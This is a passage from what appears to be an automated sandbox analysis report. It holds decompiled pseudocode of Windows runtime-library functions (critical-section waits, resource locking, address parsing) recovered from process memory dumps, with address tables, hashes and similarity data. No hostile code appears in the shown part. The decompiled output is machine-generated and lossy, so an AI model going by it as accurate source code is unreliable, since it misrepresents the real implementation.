											_push( &_a4);
											_push(1);
											_t42 = E021EF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02233915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E021EF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02233915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02215329(_t74, _t92);
													_push(1);
													_t48 = E022153A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                0x022153ab
                                                0x022153ae
                                                0x022153b1
                                                0x022153b4
                                                0x022153b7
                                                0x022305b6
                                                0x022305c0
                                                0x022305c3
                                                0x00000000
                                                0x022305c9
                                                0x022305c9
                                                0x022305cc
                                                0x022305d5
                                                0x022305d5
                                                0x022153bd
                                                0x022153bd
                                                0x022153bd
                                                0x022153be
                                                0x022153be
                                                0x022153be
                                                0x022153c0
                                                0x00000000
                                                0x00000000
                                                0x02252269
                                                0x0225226d
                                                0x02252349
                                                0x0225234d
                                                0x02252273
                                                0x02252276
                                                0x02252279
                                                0x0225227e
                                                0x02252283
                                                0x02252287
                                                0x0225228a
                                                0x0225228d
                                                0x0225228f
                                                0x022522bc
                                                0x022522bc
                                                0x022522bc
                                                0x022522be
                                                0x022522c4
                                                0x022522cc
                                                0x022522d0
                                                0x022522d6
                                                0x022522d7
                                                0x022522da
                                                0x022522df
                                                0x022522e4
                                                0x00000000
                                                0x00000000
                                                0x022522e6
                                                0x022522e9
                                                0x022522f4
                                                0x022522f9
                                                0x022522fa
                                                0x02252305
                                                0x02252314
                                                0x02252319
                                                0x0225231a
                                                0x0225231d
                                                0x02252320
                                                0x02252323
                                                0x02252323
                                                0x02252328
                                                0x0225232d
                                                0x0225232f
                                                0x02252331
                                                0x02252336
                                                0x02252336
                                                0x0225233b
                                                0x0225233d
                                                0x02252350
                                                0x02252351
                                                0x02252356
                                                0x02252359
                                                0x02252359
                                                0x0225235b
                                                0x0225235d
                                                0x02215367
                                                0x0221536b
                                                0x02215372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02252363
                                                0x02252363
                                                0x02252369
                                                0x0225236a
                                                0x0225236c
                                                0x02252371
                                                0x02252373
                                                0x00000000
                                                0x02252379
                                                0x02252379
                                                0x0225237a
                                                0x0225237f
                                                0x0225237f
                                                0x02252385
                                                0x02252386
                                                0x02252389
                                                0x0225238e
                                                0x02252390
                                                0x02215378
                                                0x0221537c
                                                0x02252396
                                                0x02252396
                                                0x02252397
                                                0x0225239c
                                                0x022523a2
                                                0x022523a3
                                                0x022523a6
                                                0x022523ab
                                                0x022523ad
                                                0x00000000
                                                0x022523b3
                                                0x022523b3
                                                0x022523b4
                                                0x022523b9
                                                0x022523ba
                                                0x022523ba
                                                0x022523bc
                                                0x022523bf
                                                0x00000000
                                                0x00000000
                                                0x02249153
                                                0x02249158
                                                0x0224915a
                                                0x0224915e
                                                0x02249160
                                                0x00000000
                                                0x02249166
                                                0x02249166
                                                0x02249171
                                                0x02249176
                                                0x02249176
                                                0x00000000
                                                0x02249160
                                                0x022523c6
                                                0x022523cb
                                                0x022523ce
                                                0x022523d7
                                                0x022523d7
                                                0x022523ad
                                                0x02252390
                                                0x02252373
                                                0x0225233f
                                                0x0225233f
                                                0x00000000
                                                0x0225233f
                                                0x02252291
                                                0x02252291
                                                0x02252293
                                                0x02252295
                                                0x0225229a
                                                0x022522a1
                                                0x022522a3
                                                0x022522a7
                                                0x022522a9
                                                0x00000000
                                                0x00000000
                                                0x022522ab
                                                0x022522ad
                                                0x022522af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x022522af
                                                0x022522b1
                                                0x022522b4
                                                0x022522b4
                                                0x022522b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x022522b6
                                                0x0225228f
                                                0x00000000
                                                0x0225226d
                                                0x022153cb
                                                0x022153ce
                                                0x022153d0
                                                0x022153d4
                                                0x022153d6
                                                0x00000000
                                                0x022153d8
                                                0x022153e3
                                                0x022153ea
                                                0x022153ea
                                                0x022153d6
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022522F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 022522FC
                                                • RTL: Re-Waiting, xrefs: 02252328
                                                • RTL: Resource at %p, xrefs: 0225230B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: cfd1b7a0fed4398dcadeda7916de8b93a89fe505ac47536409a2bd9f6e7d3748
                                                • Instruction ID: b03ccd444af500d1dc16353586da1a3140404eaa645e22717d5236834d0ba783
                                                • Opcode Fuzzy Hash: cfd1b7a0fed4398dcadeda7916de8b93a89fe505ac47536409a2bd9f6e7d3748
                                                • Instruction Fuzzy Hash: 63510971620712ABDB25DFB4CC80FA673D9AF94324F104259FD55DF288EB71E9428BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0221EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E0221EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0220DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x22d793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E021F16C0(_t39);
				} else {
					_t40 = E021EF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02233915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E021F01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x22d793c; // 0x0
								_push(_t85);
								_t44 = E021F1F28(_t71);
							} else {
								_t44 = E021EF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02233915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02272306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0221EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02234FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02243F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02243F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x22d20c0;
								if(_t85 != 0x22d20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0227217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02243F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                0x0221ec56
                                                0x0221ec56
                                                0x0221ec56
                                                0x0221ec5c
                                                0x0221ec64
                                                0x022523e6
                                                0x022523eb
                                                0x022523eb
                                                0x0221ec6a
                                                0x0221ec6c
                                                0x0221ec6f
                                                0x022523f3
                                                0x022523f8
                                                0x022523fa
                                                0x022523fc
                                                0x0221ec75
                                                0x0221ec76
                                                0x0221ec76
                                                0x0221ec7b
                                                0x0221ec7c
                                                0x0221ec7e
                                                0x02252406
                                                0x02252407
                                                0x0225240c
                                                0x0225240d
                                                0x0225240d
                                                0x0225240d
                                                0x02252414
                                                0x02252417
                                                0x0225241e
                                                0x02252435
                                                0x02252438
                                                0x0225243c
                                                0x0225243f
                                                0x02252442
                                                0x02252443
                                                0x02252446
                                                0x02252449
                                                0x02252453
                                                0x02252455
                                                0x0225245b
                                                0x0225245b
                                                0x0221eb99
                                                0x0221eb99
                                                0x0221eb9c
                                                0x0221eb9d
                                                0x0221eb9f
                                                0x0221eba2
                                                0x02252465
                                                0x0225246b
                                                0x0225246d
                                                0x0221eba8
                                                0x0221eba9
                                                0x0221eba9
                                                0x0221ebae
                                                0x0221ebb3
                                                0x0221ebb9
                                                0x0221ebbb
                                                0x02252513
                                                0x02252514
                                                0x02252519
                                                0x0225251b
                                                0x0221ec2a
                                                0x0221ec2d
                                                0x0221ec33
                                                0x0221ec36
                                                0x0221ec3a
                                                0x0221ec3e
                                                0x0221ec40
                                                0x0221ec47
                                                0x0221ec47
                                                0x0221ec40
                                                0x021f22c6
                                                0x0221ebc1
                                                0x0221ebc1
                                                0x0221ebc5
                                                0x0221ec9a
                                                0x0221ec9a
                                                0x0221ebd6
                                                0x0221ebd6
                                                0x00000000
                                                0x0221ebbb
                                                0x02252477
                                                0x0225247c
                                                0x02252486
                                                0x0225248b
                                                0x02252496
                                                0x0225249b
                                                0x0225249d
                                                0x022524a0
                                                0x022524a3
                                                0x022524aa
                                                0x022524aa
                                                0x022524a5
                                                0x022524a5
                                                0x022524a5
                                                0x022524ac
                                                0x022524af
                                                0x022524b0
                                                0x022524b3
                                                0x022524b9
                                                0x022524ba
                                                0x022524bb
                                                0x022524c6
                                                0x022524cb
                                                0x022524cd
                                                0x022524d0
                                                0x022524d1
                                                0x022524d4
                                                0x022524d6
                                                0x022524d9
                                                0x022524d9
                                                0x022524dc
                                                0x022524df
                                                0x022524e1
                                                0x022524e7
                                                0x022524e9
                                                0x022524ec
                                                0x022524ef
                                                0x022524f2
                                                0x022524f2
                                                0x022524ef
                                                0x022524e7
                                                0x022524fa
                                                0x022524ff
                                                0x02252501
                                                0x02252503
                                                0x02252506
                                                0x0225250b
                                                0x0221eb8c
                                                0x0221eb93
                                                0x00000000
                                                0x00000000
                                                0x0221eb93
                                                0x00000000
                                                0x0221eb99
                                                0x0221ec85
                                                0x0221ec85
                                                0x0221ec85
                                                0x00000000

                                                Strings
                                                • RTL: Re-Waiting, xrefs: 022524FA
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 022524BD
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0225248D
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 6f414fec3b706bb5c0d9b30512d4b8c236d0076c4f7fb9edec130bb1393517b2
                                                • Instruction ID: 22a58830d38570de28534279b9b524864636b11aedf734d44609b80715af5252
                                                • Opcode Fuzzy Hash: 6f414fec3b706bb5c0d9b30512d4b8c236d0076c4f7fb9edec130bb1393517b2
                                                • Instruction Fuzzy Hash: A841B2B0A20215EBD724DFE8CC84F6A77EAAF44720F108705FE659B2C8D774E9418B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0222FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0222FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0222EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0222EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0222685D(_t167, 4) == 0) {
								if(E0222685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0222685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0222685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02208980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E021FDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0222EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0222EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                0x0222fcd1
                                                0x0222fcd6
                                                0x0222fcd9
                                                0x0222fcdc
                                                0x0222fcdf
                                                0x0222fce2
                                                0x0222fce5
                                                0x0222fce8
                                                0x0222fceb
                                                0x0222fced
                                                0x0222fced
                                                0x0222fcf3
                                                0x00000000
                                                0x00000000
                                                0x0222fcfc
                                                0x0222fcfe
                                                0x0222fdc1
                                                0x0225ecbd
                                                0x00000000
                                                0x0225eccc
                                                0x0225eccc
                                                0x0225ecd2
                                                0x00000000
                                                0x00000000
                                                0x0225ecdf
                                                0x0225ece0
                                                0x0225ece4
                                                0x0225eceb
                                                0x0225ecee
                                                0x0225eca8
                                                0x0225eca8
                                                0x0225ecaa
                                                0x0222fd76
                                                0x0222fd79
                                                0x0222fdb4
                                                0x0222fdb5
                                                0x0222fdb6
                                                0x00000000
                                                0x0222fdb6
                                                0x0222fd7e
                                                0x0225ecfc
                                                0x0222fe2f
                                                0x00000000
                                                0x0222fe2f
                                                0x0225ed08
                                                0x0225ed0f
                                                0x0225ed17
                                                0x0225ed1b
                                                0x00000000
                                                0x0225ed1b
                                                0x0222fd88
                                                0x00000000
                                                0x00000000
                                                0x0222fd94
                                                0x0222fd99
                                                0x0222fda1
                                                0x00000000
                                                0x00000000
                                                0x0222fdb0
                                                0x00000000
                                                0x0222fdb0
                                                0x0225ecbd
                                                0x0222fdc7
                                                0x0222fdcb
                                                0x00000000
                                                0x0222fdd7
                                                0x0222fde3
                                                0x0222fe06
                                                0x02241fe7
                                                0x00000000
                                                0x00000000
                                                0x02241fef
                                                0x02241ff0
                                                0x02241ff4
                                                0x02241ff7
                                                0x02241ffa
                                                0x02241ffd
                                                0x02242000
                                                0x00000000
                                                0x00000000
                                                0x0225ecf1
                                                0x00000000
                                                0x0225ecf1
                                                0x00000000
                                                0x0222fe06
                                                0x0222fde8
                                                0x0222fdec
                                                0x0222fdef
                                                0x0222fdf2
                                                0x00000000
                                                0x0222fdf2
                                                0x0222fdcb
                                                0x0222fd04
                                                0x0222fd05
                                                0x0225ec67
                                                0x00000000
                                                0x00000000
                                                0x0225ec6f
                                                0x00000000
                                                0x0225ec6f
                                                0x0222fd13
                                                0x0222fd3c
                                                0x0222fd40
                                                0x0225ec75
                                                0x0225ec7a
                                                0x00000000
                                                0x0225ec8a
                                                0x0225ec8a
                                                0x0225ec90
                                                0x0225ecb2
                                                0x0222fd73
                                                0x0222fd73
                                                0x00000000
                                                0x0222fd73
                                                0x0225ec95
                                                0x00000000
                                                0x00000000
                                                0x0225eca1
                                                0x0225eca4
                                                0x0225eca5
                                                0x00000000
                                                0x0225eca5
                                                0x0225ec7a
                                                0x0222fd4a
                                                0x00000000
                                                0x0222fd6e
                                                0x0222fd6e
                                                0x0222fd71
                                                0x00000000
                                                0x0222fd71
                                                0x0222fd4a
                                                0x0222fd21
                                                0x0223a3a1
                                                0x00000000
                                                0x0223a3a1
                                                0x0222fd36
                                                0x0224200b
                                                0x02242012
                                                0x00000000
                                                0x00000000
                                                0x02242018
                                                0x00000000
                                                0x02242018
                                                0x00000000
                                                0x0222fd36
                                                0x0222fe0f
                                                0x0222fe16
                                                0x0223a3ad
                                                0x00000000
                                                0x00000000
                                                0x0223a3b3
                                                0x0223a3b3
                                                0x0222fe1f
                                                0x0225ed25
                                                0x0225ed86
                                                0x00000000
                                                0x00000000
                                                0x0225ed91
                                                0x0225ed95
                                                0x0225ed95
                                                0x0225ed9a
                                                0x0225edad
                                                0x0225edb3
                                                0x0225edba
                                                0x0225edc4
                                                0x0225edc9
                                                0x00000000
                                                0x0225edcc
                                                0x0225ed2a
                                                0x0225ed55
                                                0x00000000
                                                0x00000000
                                                0x0225ed61
                                                0x0225ed66
                                                0x0225ed6e
                                                0x00000000
                                                0x00000000
                                                0x0225ed7d
                                                0x00000000
                                                0x0225ed7d
                                                0x0225ed30
                                                0x00000000
                                                0x00000000
                                                0x0225ed3c
                                                0x0225ed43
                                                0x0225ed4b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2344563978.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                • Associated: 00000009.00000002.2344559335.00000000021D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344635555.00000000022C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344640452.00000000022D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344646208.00000000022D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344651330.00000000022D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344656029.00000000022E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.2344707073.0000000002340000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: aa123af848fae1f69e4302daccf16f3bda24eb7c1fff41e6021ee553a1aa6f81
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: 6791B031D2022AFEDF25CFD8C9447AEB7B4EF40308F20806AD805A6559E7725B49CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%